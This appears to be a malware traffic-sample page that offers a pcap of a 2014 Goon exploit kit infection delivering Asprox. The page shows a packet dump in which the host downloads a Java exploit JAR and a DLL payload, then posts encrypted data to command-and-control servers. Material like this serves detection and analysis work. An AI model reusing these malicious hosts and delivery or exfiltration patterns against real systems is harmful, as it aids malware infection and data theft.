Text Example

Goon EK Exploit Kit Delivers Asprox Malware Java PCAP file download traffic sample

Download Attachments

  • 1 pcap 10
    Date added: May 23, 2019 9:35 pm Added by: admin File size: 615 KB Downloads: 36

2014-02-13 08:30:38.307221 IP 192.168.204.164.50160 > 109.163.239.243.80: Flags [.], ack 1, win 64240, length 0
E..(3O@………m……P)…nRu]P…;………
2014-02-13 08:30:38.307546 IP 192.168.204.164.50160 > 109.163.239.243.80: Flags [P.], seq 1:297, ack 1, win 64240, length 296: HTTP: GET /libz29.64/jquery/ HTTP/1.1
E..P3P@….s….m……P)…nRu]P….B..GET /libz29.64/jquery/ HTTP/1.1
Accept: /
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 4.0.3219)
Host: milk-mass.com
Cache-Control: no-cache

2014-02-13 08:30:38.307551 IP 109.163.239.243.80 > 192.168.204.164.50160: Flags [.], ack 297, win 64240, length 0
E..(.8……m……..P..nRu])…P…:Z……..

2014-02-13 08:30:38.464814 IP 109.163.239.243.80 > 192.168.204.164.50160: Flags [P.], seq 1:1461, ack 297, win 64240, length 1460: HTTP: HTTP/1.1 200 OK

2014-02-13 08:30:42.572662 IP 192.168.204.164.50161 > 217.160.26.3.80: Flags [.], ack 1, win 64240, length 0
E..(3.@…FS………..P….3]..P…O………
2014-02-13 08:30:42.765890 IP 192.168.204.164.50161 > 217.160.26.3.80: Flags [P.], seq 1:271, ack 1, win 64240, length 270: HTTP: GET /viewer/updater.jnlp HTTP/1.1
E..63.@…ED………..P….3]..P…S(..GET /viewer/updater.jnlp HTTP/1.1
accept-encoding: gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: paisasantcugat.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

2014-02-13 08:30:42.765932 IP 217.160.26.3.80 > 192.168.204.164.50161: Flags [.], ack 271, win 64240, length 0

2014-02-13 08:30:43.070694 IP 192.168.204.164.50161 > 217.160.26.3.80: Flags [.], ack 792, win 63449, length 0
E..(3.@…FP………..P….3]..P…N………
2014-02-13 08:30:44.150297 IP 192.168.204.164.50161 > 217.160.26.3.80: Flags [P.], seq 271:595, ack 792, win 63449, length 324: HTTP: GET /viewer/updater.jar HTTP/1.1
E..l3.@…E
………..P….3]..P…….GET /viewer/updater.jar HTTP/1.1
content-type: application/x-java-archive
accept-encoding: pack200-gzip,gzip
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: paisasantcugat.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive


2014-02-13 08:30:44.333020 IP 192.168.204.164.50162 > 217.160.26.3.80: Flags [.], ack 1, win 64240, length 0
E..(3.@…FL………..PO… .’QP…*………
2014-02-13 08:30:44.336915 IP 192.168.204.164.50162 > 217.160.26.3.80: Flags [P.], seq 1:283, ack 1, win 64240, length 282: HTTP: GET /viewer/updater.jar HTTP/1.1
E..B3.@…E1………..PO… .’QP……GET /viewer/updater.jar HTTP/1.1
accept-encoding: pack200-gzip, gzip
content-type: application/x-java-archive
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_15
Host: paisasantcugat.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, /; q=.2
Connection: keep-alive

2014-02-13 08:30:44.336991 IP 217.160.26.3.80 > 192.168.204.164.50162: Flags [.], ack 283, win 64240, length 0

E..(……:5………P.. .’QO…P…)………

E..(.v@….v….m……P.+..
n..P…[………
2014-02-13 08:31:27.786595 IP 192.168.204.164.49158 > 109.163.239.243.80: Flags [P.], seq 1:189, ack 1, win 64240, length 188: HTTP: GET /w56/soft32.dll HTTP/1.1
E….w@………m……P.+..
n..P…….GET /w56/soft32.dll HTTP/1.1
Accept: /
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: milk-mass.com
Cache-Control: no-cache

2014-02-13 08:31:27.786703 IP 109.163.239.243.80 > 192.168.204.164.49158: Flags [.], ack 189, win 64240, length 0
E..(……..m……..P..

n…+.NP…Z………

2014-02-13 08:31:32.689988 IP 192.168.204.164.49159 > 78.60.70.213.80: Flags [.], ack 1, win 64240, length 0
E..(..@………N 78.60.70.213.80: Flags [P.], seq 1:464, ack 1, win 64240, length 463: HTTP: GET /b/eve/8c2e883fee499f51086fec65 HTTP/1.1
E…..@………N<F….P….dA..P…….GET /b/eve/8c2e883fee499f51086fec65 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Accept-Language: en-US
Referer: http://www.google.com/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: cioco-froll.com
Connection: Keep-Alive

2014-02-13 08:31:32.690233 IP 78.60.70.213.80 > 192.168.204.164.49159: Flags [.], ack 464, win 64240, length 0

2014-02-13 08:32:25.717940 IP 192.168.204.164.49160 > 109.86.37.97.80: Flags [.], ack 1, win 64240, length 0
E..(..@………mV%a…Pm8!…w.P………….
2014-02-13 08:32:25.718286 IP 192.168.204.164.49160 > 109.86.37.97.80: Flags [P.], seq 1:455, ack 1, win 64240, length 454: HTTP: POST /b/opt/D6F3CC1258C05EEB3AA74985 HTTP/1.1
E…..@….>….mV%a…Pm8!…w.P….l..POST /b/opt/D6F3CC1258C05EEB3AA74985 HTTP/1.1
Accept: /
Content-Type: application/octet-stream
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: cioco-froll.com
Content-Length: 186
Cache-Control: no-cache

….&b=.oY..D.0…..N<..!P.z..&c…N.&………D. ….A..x..o..T…/A.u}.2…~..o’|…………….h..[..,…….)R…. .*!Zw..8.x.:………;.j..G.J.. @…j%..

2014-02-13 08:32:25.718296 IP 109.86.37.97.80 > 192.168.204.164.49160: Flags [.], ack 455, win 64240, length 0

2014-02-13 08:32:41.749080 IP 192.168.204.164.49161 > 109.86.37.97.80: Flags [.], ack 1, win 64240, length 0
E..(..@………mV%a. .P..^.{.B.P………….
2014-02-13 08:32:41.749446 IP 192.168.204.164.49161 > 109.86.37.97.80: Flags [P.], seq 1:208, ack 1, win 64240, length 207: HTTP: GET /b/letr/036923DD1C1D3D157E7A2A7B HTTP/1.1
E…..@….0….mV%a. .P..^.{.B.P…….GET /b/letr/036923DD1C1D3D157E7A2A7B HTTP/1.1
Accept: /
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: cioco-froll.com
Cache-Control: no-cache

2014-02-13 08:32:41.749550 IP 109.86.37.97.80 > 192.168.204.164.49161: Flags [.], ack 208, win 64240, length 0
E..(.q…..ZmV%a…..P. {.B…_.P………….

2014-02-13 08:32:42.267199 IP 109.86.37.97.80 > 192.168.204.164.49161: Flags [FP.], seq 1:349, ack 208, win 64240, length 348: HTTP: HTTP/1.1 200 OK

E..(..@………mV%a.
.P..~:..j.P…,G……..
2014-02-13 08:32:42.459428 IP 192.168.204.164.49162 > 109.86.37.97.80: Flags [P.], seq 1:455, ack 1, win 64240, length 454: HTTP: POST /b/opt/4D04D207457A2CFB271D3B95 HTTP/1.1
E…..@….4….mV%a.
.P..~:..j.P…….POST /b/opt/4D04D207457A2CFB271D3B95 HTTP/1.1
Accept: /
Content-Type: application/octet-stream
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: cioco-froll.com
Content-Length: 186
Cache-Control: no-cache

.._[.E5.u.#p.r<…./. .{…a……N…..4T…X.J..zS…….G….S9’…Y…;&.o.TRZ…K….;….<.zA..Ay…. ..!…….’;..x bm..=Rx…

.9v.t..!.._.&n…-….rg….U..M.$..a\R..X)…..

2014-02-13 08:32:59.167203 IP 192.168.204.164.49163 > 109.86.37.97.80: Flags [.], ack 1, win 64240, length 0
E..(..@………mV%a…P.8-..FO.P…v]……..
2014-02-13 08:32:59.167750 IP 192.168.204.164.49163 > 109.86.37.97.80: Flags [P.], seq 1:455, ack 1, win 64240, length 454: HTTP: POST /b/req/F8D2498366494C6D042E5B03 HTTP/1.1
E…..@…./….mV%a…P.8-..FO.P….%..POST /b/req/F8D2498366494C6D042E5B03 HTTP/1.1
Accept: /
Content-Type: application/octet-stream
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: cioco-froll.com
Content-Length: 186
Cache-Control: no-cache

….pr..49…. ..2n,..C1…|………k….<d…….{…..,x.a7…..]../<…* ..!.N-N….y……u.T….B……0Y.(.”…6.K…’J..S.j..V……0.u.&…._l…..B9…..Y.3..1…;.<..Y.cN…..

2014-02-13 08:32:59.167759 IP 109.86.37.97.80 > 192.168.204.164.49163: Flags [.], ack 455, win 64240, length 0

2014-02-13 08:33:00.025635 IP 192.168.204.164.49164 > 89.109.26.81.80: Flags [.], ack 1, win 64240, length 0
E..(..@………Ym.Q…P!2..9.+.P………….
2014-02-13 08:33:00.025893 IP 192.168.204.164.49164 > 89.109.26.81.80: Flags [P.], seq 1:464, ack 1, win 64240, length 463: HTTP: GET /b/eve/4745276d25223003a2badb35 HTTP/1.1
E…..@………Ym.Q…P!2..9.+.P…….GET /b/eve/4745276d25223003a2badb35 HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, /
Referer: http://www.google.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: cioco-froll.com
Connection: Keep-Alive

2014-02-13 08:33:00.025988 IP 89.109.26.81.80 > 192.168.204.164.49164: Flags [.], ack 464, win 64240, length 0

2014-02-13 08:33:41.675286 IP 192.168.204.164.49166 > 109.86.37.97.80: Flags [.], ack 1, win 64240, length 0
E..(..@………mV%a…P…}>t..P………….
2014-02-13 08:33:41.675292 IP 192.168.204.164.49166 > 109.86.37.97.80: Flags [P.], seq 1:455, ack 1, win 64240, length 454: HTTP: POST /b/req/977D94BF7D6485321F03925C HTTP/1.1
E…..@………mV%a…P…}>t..P… …POST /b/req/977D94BF7D6485321F03925C HTTP/1.1
Accept: /
Content-Type: application/octet-stream
Connection: Close
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Host: cioco-froll.com
Content-Length: 186
Cache-Control: no-cache

Leave a Reply